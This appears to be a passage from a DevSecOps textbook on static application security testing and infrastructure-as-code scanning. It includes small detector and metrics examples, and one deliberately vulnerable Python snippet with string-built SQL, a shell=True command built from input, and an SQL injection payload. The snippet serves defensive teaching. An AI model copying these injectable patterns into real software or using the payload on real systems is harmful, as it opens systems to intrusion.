• Integration with development tools: SAST tools can be integrated with development tools such as IDEs and build systems to scan code during the development process. This allows developers to identify and fix vulnerabilities early in the SDLC.
• Reporting: SAST tools provide detailed reports that list the identified vulnerabilities and provide guidance on how to fix them. The reports may include code snippets or suggested changes to the code to fix the vulnerabilities.
• Compliance checking: SAST tools can check code for compliance with security standards and regulations, such as the OWASP Top Ten, PCI DSS, and HIPAA.

In summary, SAST tools are automated software tools that analyze source code or compiled binaries to identify potential security vulnerabilities. SAST tools provide several functionalities that help ensure that software applications are secure and resilient against security risks.
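A toy version of rule-based scanning can be written in a few lines: each rule is a regular expression plus a message, applied line by line to source text. The rules below are illustrative; real SAST engines layer data flow and taint analysis on top of pattern matching, which is exactly what keeps the false positive rate down.

```python
import re

# Illustrative rules: (pattern, finding message)
RULES = [
    (re.compile(r"\beval\("), "use of eval(): possible code injection"),
    (re.compile(r"password\s*=\s*[\"']"), "hard-coded password"),
    (re.compile(r"\bpickle\.loads\("), "unsafe deserialization"),
]

def scan(source):
    """Return (line_number, message) findings for one file's text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for pattern, message in RULES:
            if pattern.search(line):
                findings.append((lineno, message))
    return findings

sample = 'password = "hunter2"\nresult = eval(user_input)\n'
for lineno, message in scan(sample):
    print(f"line {lineno}: {message}")
```

Customizing such a rule set to an organization’s coding standards is the same idea, at small scale, as the configurable rule packs commercial SAST tools ship with.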

Identifying vulnerabilities early in the development process

Identifying vulnerabilities early in the development process is one of the key benefits of SAST, along with Software Composition Analysis (SCA) and threat modeling. SAST tools analyze application source code before it is compiled and deployed, allowing vulnerabilities to be identified early in the development cycle. By doing this, organizations can remediate vulnerabilities before they are deployed into production, which reduces the risk of security incidents, minimizes the cost of remediation, and helps them comply with regulatory requirements.

The SAST process

The SAST process is a set of activities and workflows that are used to perform SAST. Here is an overview of the typical SAST process and workflow:

1. Tool selection: The first step is to select a suitable SAST tool that meets the requirements of the application being tested. This includes considering factors such as the programming language used, the complexity of the application, and the type of vulnerabilities to be identified.


2. Configuration: The SAST tool needs to be configured to analyze the application source code. This includes defining the scope of the analysis, such as which files and directories should be analyzed, and specifying any custom rules or settings.
3. Code scanning: The SAST tool scans the application source code to identify potential security vulnerabilities. This process is performed automatically and typically takes several hours to complete, depending on the size and complexity of the application.
4. Vulnerability identification: The SAST tool identifies potential vulnerabilities in the application source code based on the predefined rules and algorithms. The tool generates a report that lists the vulnerabilities, along with information about the location of the vulnerability in the code, the severity of the issue, and recommendations for remediation.
5. Review and analysis: The report is reviewed and analyzed by security experts to confirm the validity of the identified vulnerabilities and prioritize them based on severity and potential impact. This step may also include further investigation of the identified vulnerabilities, such as testing to determine if they can be exploited or if there are any mitigating factors.
6. Remediation: The identified vulnerabilities are remediated by the development team. This may involve modifying the code to eliminate the vulnerabilities, adding additional security controls or checks, or replacing vulnerable third-party components.
7. Verification: The remediated code is tested to ensure that the identified vulnerabilities have been properly addressed and that no new vulnerabilities have been introduced. This may include both manual testing and automated testing using the SAST tool or other testing tools.
8. Reporting: A final report is generated that summarizes the findings of the SAST testing process, including the vulnerabilities identified, their severity, and the remediation steps taken.

SAST metrics

SAST metrics and reporting refer to the process of measuring the effectiveness and efficiency of SAST and communicating the results to stakeholders. Here are some of the common metrics and reporting practices in SAST:

• Code coverage: Code coverage is a measure of the percentage of the application’s code that was analyzed by the SAST tool. Code coverage can help to identify areas of the application that were not analyzed and may be vulnerable to security risks.
• Vulnerability density: Vulnerability density is a measure of the number of vulnerabilities per line of code. This metric can help to identify areas of the code that may require additional testing and remediation.
• False positive rate: The false positive rate is a measure of the number of vulnerabilities identified by the SAST tool that are not actual vulnerabilities. A high false positive rate can lead to wasted time and resources on unnecessary remediation.


• Remediation time: Remediation time is a measure of the time it takes to fix identified vulnerabilities. This metric can help to identify areas of the code that may require additional attention and resources.
• Risk ranking: Risk ranking is a measure of the severity and potential impact of identified vulnerabilities. This metric can help to prioritize remediation efforts and allocate resources more effectively.

Reporting practices in SAST typically involve generating a report that summarizes the findings of the SAST analysis, including the identified vulnerabilities, their severity, and recommendations for remediation. The report should be clear and concise and should be tailored to the needs of the intended audience, such as developers, security analysts, or management. It is important to communicate the results of the SAST analysis in a way that is easy to understand and actionable, to ensure that identified vulnerabilities are properly remediated and that the overall security posture of the application is improved.
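Several of these metrics reduce to simple ratios over one scan’s raw numbers. A sketch of computing them; the figures are illustrative, and density is normalized per thousand lines (KLOC), a common convention.

```python
def sast_metrics(total_findings, confirmed, lines_scanned, lines_total):
    """Compute common SAST metrics from one scan's raw counts."""
    false_positives = total_findings - confirmed
    return {
        # confirmed vulnerabilities per 1,000 lines of analyzed code
        "vulnerability_density_per_kloc": confirmed / (lines_scanned / 1000),
        # share of reported findings that turned out not to be real
        "false_positive_rate": false_positives / total_findings,
        # share of the code base the tool actually analyzed
        "code_coverage": lines_scanned / lines_total,
    }

m = sast_metrics(total_findings=40, confirmed=30,
                 lines_scanned=80_000, lines_total=100_000)
print(m)  # density 0.375/KLOC, false positive rate 0.25, coverage 0.8
```

Tracking these values scan over scan is more informative than any single snapshot: a rising false positive rate signals rule tuning is needed, while falling coverage flags code the tool is silently skipping.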

Integrating SAST with other security tools

Integrating SAST with other security tools is important for achieving a comprehensive and effective security testing program. Here are some examples of how SAST can be integrated with other security tools:

• Integrated Development Environment (IDE) integration: SAST tools can be integrated with IDEs to provide real-time feedback to developers as they write code. This helps identify potential vulnerabilities as soon as they are introduced, allowing for immediate remediation.
• Continuous Integration/Continuous Deployment (CI/CD) integration: SAST tools can be integrated with CI/CD pipelines to automatically analyze code changes as they are committed to the code repository. This helps to identify vulnerabilities early in the development process and enables faster remediation.
• Web Application Firewall (WAF) integration: SAST tools can be integrated with WAFs to provide additional protection against known vulnerabilities.
• DAST integration: SAST tools can be integrated with DAST tools to provide a more comprehensive security testing program. SAST tools analyze the code to identify potential vulnerabilities, while DAST tools test the application in a running environment to identify vulnerabilities that may not be apparent in the code.
• Threat intelligence integration: SAST tools can be integrated with threat intelligence feeds to provide additional context and prioritize remediation efforts. Threat intelligence feeds can provide information on known threats and vulnerabilities, which can be used to guide the SAST analysis and prioritize remediation efforts.

By integrating SAST with other security tools, organizations can create a more comprehensive and effective security testing program that helps to identify and remediate vulnerabilities earlier in the development process, reducing the risk of security incidents and improving the overall security posture of the application.


Resolving issues without breaking the build

Resolving issues without breaking the build is an important aspect of integrating SAST into the development process. With a DevSecOps process in place, we need to make sure that when we help developers identify a critical issue, the build does not fail outright and the issue can still be fixed within the stipulated timeline.

To accomplish this, developers need to understand the nature of the vulnerability and its impact on the application. They also need to have access to tools and resources that can help them resolve the issue, such as code snippets or guidance on best practices.

One approach to resolving issues without breaking the build is to use an iterative development process. In this approach, developers identify and remediate vulnerabilities in small batches, testing each change to ensure that it does not introduce new vulnerabilities or break the build. Another approach is to use code branching and version control to isolate changes to the vulnerable code, allowing developers to make changes and test them without impacting the rest of the application. Once these changes have been tested and verified, they can be merged back into the main code base.

In addition, developers can use automated testing tools, such as unit testing and integration testing, to verify that the changes they make do not break the build or impact other functionality. This can help ensure that vulnerabilities are remediated quickly and efficiently, without introducing new issues or delaying the development process.

When integrating SAST into the development process, it is essential to ensure that vulnerabilities are remediated without breaking the build or impacting other functionality.
There are several approaches that developers can take to achieve this goal:

• Iterative development: With an iterative development approach, developers identify and remediate vulnerabilities in small batches, testing each change to ensure that it does not introduce new vulnerabilities or break the build. This approach allows developers to focus on a specific set of vulnerabilities and ensure that each one is remediated effectively before moving on to the next set.
• Code branching and version control: Code branching and version control allow developers to isolate changes to the vulnerable code, making it easier to test and verify changes without impacting the rest of the application. This approach can be especially useful when multiple developers are working on the same code base or when changes need to be made quickly and efficiently.
• Automated testing: Automated testing tools, such as unit testing and integration testing, can help verify that changes that have been made to remediate vulnerabilities do not break the build or impact other functionality. By using these tools, developers can quickly and efficiently verify that their changes are effective without introducing new issues or delaying the development process.
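One concrete mechanism that supports these approaches is a severity-gated checkpoint in CI: the pipeline fails only for findings at or above an agreed threshold, while lower-severity findings are recorded for the next iterative batch. A minimal sketch; the severity labels and finding IDs are illustrative.

```python
# Order severities so they can be compared against a threshold.
SEVERITY_ORDER = {"LOW": 0, "MEDIUM": 1, "HIGH": 2, "CRITICAL": 3}

def gate(findings, fail_at="HIGH"):
    """findings: list of (finding_id, severity).
    Returns (build_ok, blockers, warnings)."""
    threshold = SEVERITY_ORDER[fail_at]
    blockers = [f for f in findings if SEVERITY_ORDER[f[1]] >= threshold]
    warnings = [f for f in findings if SEVERITY_ORDER[f[1]] < threshold]
    return not blockers, blockers, warnings

ok, blockers, warnings = gate([("FINDING-1", "MEDIUM"),
                               ("FINDING-2", "LOW")])
print(ok, len(warnings))  # build passes; two items queued for later cleanup
```

Teams often tighten `fail_at` over time, starting at CRITICAL and ratcheting down as the backlog of lower-severity findings is worked off in small batches.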


The benefits of SAST

SAST provides several benefits for organizations looking to improve the security of their software applications. Here are some of the key benefits of SAST:

• Early identification of security vulnerabilities: SAST tools analyze application source code before it is compiled and deployed, allowing vulnerabilities to be identified early in the development cycle. This enables organizations to remediate vulnerabilities before they are deployed into production, reducing the risk of security incidents and minimizing the cost of remediation.
• Integration into the development process: SAST tools can be integrated into the SDLC, providing feedback to developers during the coding process. This allows developers to address vulnerabilities as they are introduced, reducing the need for post-release remediation.
• Comprehensive analysis: SAST tools can perform a comprehensive analysis of the application source code, identifying potential vulnerabilities that may not be apparent through other security testing methods. This allows organizations to identify and remediate security risks that may have been missed by other testing methods.
• Accuracy: SAST tools can provide highly accurate results, with low false positive rates. This helps reduce the amount of time and effort spent on remediation as developers can be confident that identified vulnerabilities are genuine.
• Cost-effective: SAST tools can be a cost-effective way of identifying and remediating security vulnerabilities as they can be integrated into the software development process and provide early feedback to developers. This helps reduce the cost of remediation as vulnerabilities can be addressed before they are deployed into production.
• Compliance: SAST tools can help organizations meet regulatory and compliance requirements by identifying and remediating security vulnerabilities that could lead to data breaches or other security incidents.
• Scalability: SAST tools can be scaled to accommodate large and complex applications, making them suitable for use in enterprise-level software development projects.

The limitations of SAST

While SAST can identify vulnerabilities early in the software development process, it can produce false positives and false negatives, has a limited scope, and is less effective against certain types of vulnerabilities. SAST should therefore be combined with other security testing techniques to ensure that applications are secure and resilient. Here are some of the key limitations:

• False positives: SAST tools can report vulnerabilities that do not actually exist in the code. False positives are time-consuming to triage and can take resources away from more critical vulnerabilities.

• False negatives: SAST tools may miss actual vulnerabilities, leading to a false sense of security.

• Limited context: SAST tools analyze application source code in isolation, without considering how the code interacts with other components or the overall system architecture, so some vulnerabilities only become apparent when the application runs in a live environment.

• Limited scope: SAST tools only analyze the application's own source code, so they may not identify vulnerabilities introduced by third-party libraries, frameworks, or components.

• Code quality: SAST tools are designed to identify security vulnerabilities; they may not detect issues of code quality or maintainability, which can make software harder to modify and increase the risk of future vulnerabilities.

• Complexity: SAST tools can be complex and require significant expertise to configure and use effectively, which makes them difficult to adopt for organizations without dedicated security teams.

• Limited testing coverage: SAST tools may not provide comprehensive coverage for complex applications with multiple layers of code or complex system architectures, so vulnerabilities introduced by component interactions or external dependencies can be missed.

• Lack of user input: SAST tools cannot simulate user inputs or interactions, which limits their ability to identify vulnerabilities that only appear during normal application use.
• Dependence on the quality of the input: SAST tools depend on the quality of the input, which means that poorly written or incomplete code can result in incomplete or inaccurate analysis.

Open source SAST tools

Several open source SAST tools are available that organizations can use to identify security vulnerabilities in their code. Here are some of the most popular ones:

• Bandit: Bandit is a SAST tool designed specifically for Python applications. It identifies common issues such as SQL statements built by string concatenation, shell command injection, hardcoded credentials, and the use of insecure functions. Bandit can be integrated with popular development environments such as PyCharm and Visual Studio Code, and it provides detailed reports that highlight vulnerabilities and recommended remediation steps. It is available for free on GitHub. Link: https://github.com/PyCQA/bandit


• FindSecBugs: FindSecBugs (Find Security Bugs) is a SpotBugs plugin that identifies security vulnerabilities in Java applications, such as SQL injection, command injection, and XSS. It can be used with popular Java development environments such as Eclipse and IntelliJ IDEA, and it provides detailed reports that highlight vulnerabilities and recommended remediation steps. It is available for free on GitHub. Link: https://github.com/find-sec-bugs/find-sec-bugs

• PMD: PMD is a static analyzer for multiple programming languages, including Java and JavaScript. It is primarily a code-quality tool but also includes security-related rules, and it provides detailed reports with recommended remediation steps. It is available for free on GitHub. Link: https://github.com/pmd/pmd

• ESLint: ESLint is a static analyzer (linter) for JavaScript. Combined with security-focused plugins such as eslint-plugin-security, it can flag patterns that lead to vulnerabilities such as injection and unsafe regular expressions. ESLint can be integrated with popular editors such as Visual Studio Code and Atom, and it provides detailed reports. It is available for free on GitHub. Link: https://github.com/eslint/eslint

• RIPS: RIPS is a SAST tool that identifies security vulnerabilities in PHP applications, such as SQL injection, XSS, and code injection. It provides detailed reports that highlight vulnerabilities and recommended remediation steps. It is available for free on GitHub. Link: https://github.com/robocoder/rips-scanner

• Snyk: Snyk is a popular freemium tool that supports multiple programming languages, including Java, JavaScript, Ruby, Python, and Go, and can identify vulnerabilities such as SQL injection, XSS, and remote code execution. It integrates with popular development environments such as Visual Studio Code and IntelliJ IDEA, provides detailed reports with recommended remediation steps, and can be integrated with DevOps tools such as GitHub, GitLab, and Jenkins for a seamless development workflow. Link: https://github.com/snyk/snyk

• Brakeman: Brakeman is a SAST tool designed for Ruby on Rails applications. It can identify vulnerabilities such as SQL injection, XSS, and command injection, and it provides detailed reports with recommended remediation steps. It can be integrated with editors such as Atom and Visual Studio Code. Link: https://brakemanscanner.org/


• Gosec: Gosec is a SAST tool designed for the Go programming language. It can identify issues such as SQL statements built by string concatenation, hardcoded credentials, and unsafe uses of the standard library. Gosec provides detailed reports that highlight vulnerabilities and recommended remediation steps, and it can be integrated with popular Go development environments such as Visual Studio Code and IntelliJ IDEA. Link: https://github.com/securego/gosec

• Infer: Infer is a SAST tool for the C, C++, and Java programming languages. It can identify issues such as null pointer dereferences, buffer overruns, and memory leaks, and it provides detailed reports with recommended remediation steps. It can be integrated with popular development environments such as IntelliJ IDEA and Visual Studio. Link: https://fbinfer.com/

These open source SAST tools can be useful for organizations that want to perform security testing on their code without investing in expensive commercial SAST tools. However, open source tools may not be as comprehensive or effective as commercial ones, and they may require more manual configuration and setup.
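To make such findings concrete, here is a small, deliberately vulnerable Python snippet of the kind Bandit flags. The rule IDs in the comments are Bandit's actual check identifiers; the function names and data are invented:

```python
import subprocess

def build_query_unsafe(username: str) -> str:
    # Flagged as B608 (hardcoded_sql_expressions): SQL built by string
    # concatenation lets the input rewrite the query.
    return "SELECT * FROM users WHERE name = '" + username + "'"

def list_dir_unsafe(path: str) -> bytes:
    # Flagged as B602 (subprocess_popen_with_shell_equals_true):
    # shell metacharacters in `path` could run arbitrary commands.
    return subprocess.check_output("ls " + path, shell=True)

DB_PASSWORD = "hunter2"  # flagged as B105 (hardcoded_password_string)

# The classic payload shows why B608 matters: the WHERE clause collapses.
assert "OR '1'='1" in build_query_unsafe("' OR '1'='1")
```

Running `bandit` against a file like this reports each finding with its severity, confidence, and the offending line.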

Case study 1

A software development company was building a new web application for a client. As part of their development process, they used a combination of manual code reviews and automated testing tools, including SAST, which they had integrated into their development pipeline and ran regularly to identify potential security vulnerabilities in their code.

During one of their SAST scans, they discovered a critical vulnerability: a classic SQL injection flaw that could allow an attacker to execute arbitrary SQL commands on the underlying database. Left unaddressed, this vulnerability could have exposed sensitive customer data and allowed attackers to take control of the application.

Thanks to the early detection provided by SAST, the development team was able to remediate the issue before deploying to production. They fixed the vulnerability by implementing parameterized SQL queries, a best practice that helps prevent SQL injection attacks. The team also took the opportunity to review their development practices and implement additional security measures, such as regular security training for developers and the use of additional security testing tools.

The incident highlighted the importance of incorporating SAST into the development process and the value of a strong security posture. The company delivered a secure and reliable application to their client, and the experience helped the team improve their overall approach to software security.
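The parameterized-query fix described above can be sketched as follows. The schema and data are invented, and `sqlite3` stands in for whichever database driver the team actually used:

```python
import sqlite3

def find_customer(conn: sqlite3.Connection, name: str):
    # The driver binds `name` as data, never as SQL, so input like
    # "' OR '1'='1" cannot change the structure of the query.
    cur = conn.execute("SELECT id, name FROM customers WHERE name = ?", (name,))
    return cur.fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO customers (name) VALUES (?)",
                 [("alice",), ("bob",)])

# A classic injection payload now matches no rows instead of every row.
assert find_customer(conn, "' OR '1'='1") == []
assert find_customer(conn, "alice") == [(1, "alice")]
```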

Case study 2

A large financial institution was building a new online banking application, designed to give customers a convenient and secure way to manage their accounts and conduct transactions online. As part of their development process, they integrated SAST into their pipeline to identify potential security vulnerabilities in their code.

During one of their SAST scans, they discovered a critical vulnerability: a remote code execution flaw that could allow an attacker to execute arbitrary code on the server hosting the application. Left unaddressed, this vulnerability could have exposed sensitive customer data and allowed attackers to take control of the application and the underlying infrastructure.

Thanks to the early detection provided by SAST, the development team was able to remediate the issue before deploying to production. They fixed the vulnerability by implementing input validation and sanitization, a best practice that helps prevent remote code execution attacks. The team also reviewed their development practices and implemented additional measures, such as code reviews, penetration testing, and regular security training to keep developers aware of the latest threats and best practices.

The incident highlighted the importance of incorporating SAST into the development process and of integrating security into the SDLC rather than treating it as an afterthought. The financial institution delivered a secure and reliable online banking application to their customers, and the experience helped the team improve their overall approach to software security.
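The input-validation remediation described above can be sketched as an allow-list check applied before user input reaches any server-side interpreter. The account-number format and function name are invented for illustration:

```python
import re

# Assumed format: an account ID is 8 to 12 digits, nothing else.
ACCOUNT_ID_RE = re.compile(r"[0-9]{8,12}")

def validate_account_id(raw: str) -> str:
    # Allow-list validation: reject anything that is not purely digits
    # of the expected length, so payloads such as "123; DROP TABLE"
    # or template expressions never reach the backend.
    if not ACCOUNT_ID_RE.fullmatch(raw):
        raise ValueError("invalid account id")
    return raw

assert validate_account_id("123456789") == "123456789"
try:
    validate_account_id("123; DROP TABLE accounts")
    raise AssertionError("payload should have been rejected")
except ValueError:
    pass
```

Allow-listing what is valid is generally safer than trying to block known-bad patterns, which attackers can often evade.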

Loss due to not following the SAST process

It is difficult to quantify the exact losses that result from not following SAST processes, since the impact of a security breach varies widely depending on its nature and scope, the industry in which it occurred, and other factors. However, data breaches can cause significant financial losses, both for the affected organization and for its customers. Beyond direct costs such as legal fees, remediation costs, and lost revenue, there are indirect costs such as damage to reputation, loss of customer trust, and decreased shareholder value.

According to a 2021 report by IBM, the average total cost of a data breach was $4.24 million in 2021, up from $3.86 million in 2020. This includes costs such as investigation and escalation, notification and communication, legal and regulatory expenses, and remediation and recovery.


Furthermore, the report found that the longer it took to detect and contain a breach, the higher the cost. Breaches that were detected in less than 200 days had an average total cost of $3.68 million, while breaches that took more than 200 days to detect and contain had an average total cost of $4.8 million. These figures illustrate the importance of implementing strong SAST processes and incorporating security into the SDLC to detect and remediate vulnerabilities early before they can be exploited by attackers. By doing so, organizations can help minimize the financial and reputational damage caused by security breaches.

Summary

In conclusion, SAST is a crucial process in software development that helps identify security vulnerabilities early in the development life cycle. By analyzing an application's source code for potential security issues, SAST tools help developers fix issues before they are deployed into production, reducing the risk of security breaches.

SAST offers several benefits, including early detection of vulnerabilities, cost-effective security testing, and tight integration into the development workflow. It also has limitations, including false positives and false negatives and an inability to detect certain types of issues. Despite these limitations, SAST is a critical component of a comprehensive application security program and should be used in conjunction with other measures, such as SCA and manual penetration testing, to provide a multi-layered approach to application security.

Implementing strong SAST processes and integrating SAST tools into the SDLC helps organizations identify and remediate vulnerabilities before attackers can exploit them. This can save organizations significant financial and reputational damage and help protect the personal information of customers and users. Consider the following points when it comes to SAST:

• Integration with CI/CD pipelines: SAST tools can be integrated with CI/CD pipelines to automate the testing process and ensure that code is checked for vulnerabilities at every stage of the development life cycle.

• Language support: Different SAST tools support different programming languages, so it's important to choose a tool that supports the languages used in your application.

• False positives and false negatives: SAST tools can generate false positives (flagging a non-issue as a vulnerability) and false negatives (failing to identify an actual vulnerability). It's important to understand how the tool works and configure it appropriately to reduce both.

• Tool selection: Many SAST tools are available, both open source and commercial. Choose one that fits your specific needs and budget, taking into account factors such as ease of use, language support, and reporting capabilities.


• Ongoing maintenance: SAST tools require ongoing maintenance to remain effective. This includes updating the tool to the latest version, configuring it correctly, and ensuring that it is integrated with the development process.

SAST is a valuable tool for identifying security vulnerabilities early in development. While it has its limitations, it should be part of a broader approach to application security that includes other tools and techniques, such as SCA, penetration testing, and ongoing monitoring and maintenance.

In the next chapter, we will learn more about cloud-native technologies that help in testing security in an orchestrated environment – that is, Infrastructure as Code (IaC) scanning.


10
Infrastructure-as-Code (IaC) Scanning

Infrastructure as Code (IaC) is a method of managing and provisioning computer data centers through machine-readable definition files, rather than through physical hardware configuration or interactive configuration tools. These code and configuration files describe infrastructure resources, such as virtual machines, networks, and storage, in a cloud environment. IaC scanning is the process of analyzing those files with security scanning tools designed to identify vulnerabilities and misconfigurations that could expose the environment to security threats.

The scanning process is typically automated and integrated into the CI/CD pipeline, which allows for early detection of security issues and ensures that infrastructure code is tested and validated before it is deployed. IaC scanning is an essential component of a comprehensive security strategy: by detecting and addressing security issues early in the development process, organizations can reduce the risk of security breaches and ensure that their infrastructure is secure and compliant with regulatory requirements.

In this chapter, we will cover the following aspects of IaC:

• What is IaC?
• The importance of IaC scanning
• IaC security best practices
• IaC in DevSecOps
• Open source IaC tools
• Case studies


What is IaC?

IaC is an approach to managing infrastructure using code. With IaC, infrastructure resources such as virtual machines, networks, and storage are defined and managed through code rather than configured manually through a graphical user interface (GUI) or command-line interface (CLI).

Using IaC, developers and system administrators can automate the provisioning and management of infrastructure resources, making it easier to scale and manage complex environments. The code that manages the infrastructure can be version-controlled, tested, and deployed using the same DevOps practices that are used for application code, allowing for faster and more reliable deployments.

IaC typically relies on tools such as Terraform or Ansible, which let developers and system administrators define infrastructure resources declaratively, specifying the desired state of the infrastructure in code. The tools then provision the necessary resources and ensure that the infrastructure is configured correctly. IaC is a powerful approach to managing infrastructure in the cloud, enabling organizations to automate and streamline the provisioning and management of infrastructure resources.

The importance of IaC scanning

IaC scanning is an essential practice for maintaining the security, consistency, and reliability of infrastructure. It ensures that the code defining the infrastructure complies with best practices and does not introduce vulnerabilities. As infrastructure grows in complexity and cyber threats become more sophisticated, the importance of scanning and validating IaC becomes even more pronounced. Integrating IaC scanning into the development and deployment processes helps deliver a robust, secure, and efficient infrastructure that meets organizational needs while minimizing risk. Let's delve into the different aspects of IaC scanning.

IaC toolset functionalities

IaC scanning tools typically analyze code written for configuration management and provisioning tools, such as Terraform, Ansible, or CloudFormation, and identify issues such as the following:

• Misconfigurations: IaC scanning can detect when configuration settings are incorrect or do not comply with best practices, which can result in security vulnerabilities.

• Access control: IaC scanning can detect when access control policies are not properly defined, potentially allowing unauthorized access to infrastructure resources.

• Secrets management: IaC scanning can detect when sensitive data, such as passwords or access keys, is hardcoded in the code, which can lead to data breaches.


• Compliance: IaC scanning can detect when infrastructure code does not comply with regulatory or industry-specific requirements, such as HIPAA or PCI DSS.

Beyond what scanners detect, treating infrastructure as code brings broader benefits:

• Version control: Just like your application code, infrastructure can be version-controlled. This allows for easy rollbacks, an audit trail of changes, and collaboration among teams.

• Consistency: Defining infrastructure in code ensures that it is configured the same way every time it is deployed. No more "it works on my machine" issues.

• Reproducibility: You can recreate the entire infrastructure by running the code again, which is invaluable in disaster recovery situations and when scaling.

• Documentation: Since the infrastructure is codified, the code acts as documentation; anyone reading it can understand the infrastructure setup.

• Integration with CI/CD: IaC fits well with CI/CD methodologies, allowing infrastructure changes to be part of the CI/CD pipeline.

• Cost savings: Automating infrastructure reduces manual labor, and it becomes easier to spin resources up and down as needed, which can save costs.

• Improved security: Templates and scripts ensure that the correct security configurations are always applied, reducing the risk of human error.
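A minimal sketch illustrates the kind of check a secrets-management scanner performs: pattern-matching configuration text for hardcoded credentials. This is a toy, not a real scanner, and the patterns and snippet are invented:

```python
import re

SECRET_PATTERNS = [
    re.compile(r'(?i)(password|secret|api_key)\s*=\s*"[^"]+"'),
    re.compile(r"AKIA[0-9A-Z]{16}"),  # shape of an AWS access key ID
]

def scan_for_secrets(iac_text: str) -> list:
    """Return a finding for each line that looks like a hardcoded secret."""
    findings = []
    for lineno, line in enumerate(iac_text.splitlines(), start=1):
        if any(pat.search(line) for pat in SECRET_PATTERNS):
            findings.append(f"line {lineno}: possible hardcoded secret")
    return findings

snippet = '''resource "aws_db_instance" "db" {
  username = "admin"
  password = "SuperSecret123"
}'''
assert scan_for_secrets(snippet) == ["line 3: possible hardcoded secret"]
```

Production tools such as tfsec or Checkov apply hundreds of such rules and parse the IaC language properly instead of matching raw text line by line.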

Advantages and disadvantages of IaC

Let's look at the advantages and disadvantages of IaC. The following are the advantages:

• Consistency: IaC allows infrastructure to be defined and managed in a consistent, repeatable manner, reducing the risk of human error and ensuring that infrastructure is always configured the same way

• Speed: IaC automates the process of deploying infrastructure resources, reducing the time and effort required to provision and configure environments

• Agility: IaC allows teams to quickly adapt to changing business requirements by rapidly provisioning and scaling infrastructure resources

• Version control: IaC can be stored in version control systems such as Git, allowing teams to track changes to infrastructure resources over time and roll back changes if necessary

• Collaboration: IaC can be shared among team members, promoting collaboration and enabling teams to work together more efficiently

• Scalability: IaC enables infrastructure to be easily scaled up or down as needed, making it an ideal approach for cloud-based infrastructure


• Reproducibility: IaC makes it easy to reproduce infrastructure environments, which can be especially useful in testing and development scenarios

The following are the disadvantages:

• Learning curve: There is a learning curve associated with IaC tools and their associated languages and frameworks, which can be a barrier to adoption for some teams

• Complexity: IaC can be complex, especially in large, distributed environments, and requires a high level of expertise and discipline to manage effectively

• Tooling dependencies: IaC requires additional tooling, such as version control systems and configuration management tools, which can be costly and time-consuming to implement

• Security risks: IaC introduces new security risks, such as misconfigured infrastructure and insecure code, which must be managed carefully

• Debugging: Debugging issues with IaC can be challenging and time-consuming, especially when dealing with complex infrastructure environments

• Overreliance on automation: Over-reliance on automation can lead to a lack of human oversight and potentially serious consequences in the event of a failure or security breach

Identifying vulnerabilities using IaC

By using IaC, teams can more easily identify and address vulnerabilities in their infrastructure resources, leading to a more secure and resilient environment:

• Static analysis: Just like application code, IaC files can be analyzed statically for potential security issues, such as insecure network configurations, hardcoded secrets, or incorrect user permissions. Static analysis helps identify vulnerabilities early in the development process and prevents them from reaching production environments.

• Integration with vulnerability scanning tools: IaC tools can be integrated with vulnerability scanning tools to automatically check infrastructure resources for known vulnerabilities. This helps teams stay on top of security issues and proactively address potential threats.

• Compliance checks: IaC tools can enforce compliance requirements and security best practices. For example, a tool can be configured to ensure that all resources are encrypted or that all security groups follow a specific set of rules.

• Auditing: Because IaC is version-controlled, it can be audited to confirm that infrastructure resources have been configured securely over time. This helps with compliance and regulatory requirements and provides insight into potential vulnerabilities or security issues.


What is the IaC process?

The process for implementing IaC involves several steps:

1. Define the infrastructure requirements: Identify the infrastructure requirements for the application, such as the number and type of servers, the network architecture, and storage needs.

2. Create the infrastructure code: Create the infrastructure code using a tool such as Terraform or CloudFormation. The infrastructure code specifies the resources needed for the application, such as virtual machines, load balancers, and databases.

3. Version control the infrastructure code: Check the infrastructure code into version control, just like the application code, so that changes can be tracked and rolled back if necessary.

4. Test the infrastructure code: Test the code to ensure that it works as expected, verifying that the resources are created correctly and configured securely.

5. Deploy the infrastructure code: Once the infrastructure code has been tested, deploy it to the target environment using a tool such as Jenkins or Ansible.

6. Monitor the infrastructure: After deployment, monitor the infrastructure to ensure that it is performing as expected and that there are no security vulnerabilities.

7. Update the infrastructure code: As the application evolves, update the infrastructure code to add or remove resources, following the same process of version control, testing, and deployment.

By following these steps, organizations can ensure that their infrastructure is secure, reliable, and compliant with industry standards. This approach also helps reduce the risk of errors and misconfigurations that can lead to security breaches and downtime.

IaC metrics

IaC metrics measure the performance and effectiveness of the IaC process. By tracking them, organizations can identify areas for improvement and help ensure that the infrastructure is secure, reliable, and compliant with industry standards. Some common IaC metrics include the following:

• Code coverage: The percentage of infrastructure code that has been tested. This metric helps identify areas of the infrastructure that may be more prone to errors and vulnerabilities.


• Deployment frequency: How often changes are deployed to the infrastructure. This metric helps identify bottlenecks in the deployment process and ensure that changes are deployed in a timely and efficient manner.

• Mean time to recovery (MTTR): The time it takes to recover from an infrastructure failure. This metric helps identify areas of the infrastructure that may need improvement to reduce downtime and increase reliability.

• Security vulnerabilities: The number and severity of vulnerabilities in the infrastructure code. This metric helps identify areas of the infrastructure that may be at risk of attack and ensure that security is addressed proactively.

• Compliance: The extent to which the infrastructure code complies with industry standards and regulations. This metric helps ensure that the infrastructure follows industry best practices.
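As an illustration of how such metrics can be computed, the sketch below derives MTTR from a small incident log. The field names and data are invented:

```python
from datetime import datetime, timedelta

# Invented incident log: when each outage began and when service returned.
incidents = [
    {"down": datetime(2023, 5, 1, 10, 0), "restored": datetime(2023, 5, 1, 11, 30)},
    {"down": datetime(2023, 6, 12, 9, 0), "restored": datetime(2023, 6, 12, 9, 30)},
]

def mttr(incidents) -> timedelta:
    # Mean time to recovery: average of (restored - down) across incidents.
    total = sum((i["restored"] - i["down"] for i in incidents), timedelta())
    return total / len(incidents)

assert mttr(incidents) == timedelta(hours=1)  # (90 min + 30 min) / 2
```

In practice, this data would come from a monitoring or incident-management system rather than a hardcoded list.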

IaC versus SAST

IaC scanning focuses on identifying vulnerabilities in the infrastructure itself by treating infrastructure as code and applying the same software development practices to infrastructure management. IaC scanning tools analyze the code used to create infrastructure resources and provide recommendations for improving security, compliance, and resilience. SAST, on the other hand, focuses on identifying vulnerabilities in application code: SAST tools analyze an application's source code for potential security flaws, such as SQL injection or buffer overflow vulnerabilities.

